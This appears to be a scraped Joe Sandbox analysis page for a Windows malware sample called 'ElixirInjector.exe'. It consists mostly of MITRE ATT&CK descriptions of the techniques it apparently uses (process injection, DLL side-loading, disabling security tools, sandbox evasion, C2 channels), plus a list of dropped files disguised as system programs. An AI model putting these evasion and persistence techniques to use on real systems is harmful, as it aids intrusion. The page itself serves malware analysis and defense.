Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ElixirInjector.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe

C:\Program Files\7-Zip\ad448380f74670

C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bluestacks.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontdrvhost.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fvXBwqYdGYPkplbuTcoXecCdP.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe

C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\b76422b20dc1e4

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0e24qld0.xcb.psm1

Windows Analysis Report
ElixirInjector.exe

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre